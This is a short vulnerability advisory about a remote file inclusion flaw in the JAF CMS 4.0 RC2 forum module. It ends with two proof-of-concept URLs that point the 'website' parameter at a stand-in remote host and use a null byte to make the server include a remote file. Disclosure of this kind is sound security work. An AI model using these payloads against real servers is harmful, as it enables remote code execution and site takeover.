Vulnerability ID: HTB22666 Reference: Product: JAF CMS Vendor: JAF CMS ( ) Vulnerable Version: 4.0 RC2 Vendor Notification: 21 October 2010 Vulnerability Type: Remote File Inclusion Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: High Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing ( Vulnerability Details: The vulnerability exists due to failure in the "/module/forum/main.php" & "/module/forum/forum.php" scripts to properly sanitize user-supplied input, it's possible to include any remote file if register_globals = On. The following PoC is available: http://[host]/module/forum/main.php?website=http://any_host/any_file%00 http://[host]/module/forum/forum.php?website=http://any_host/any_file%00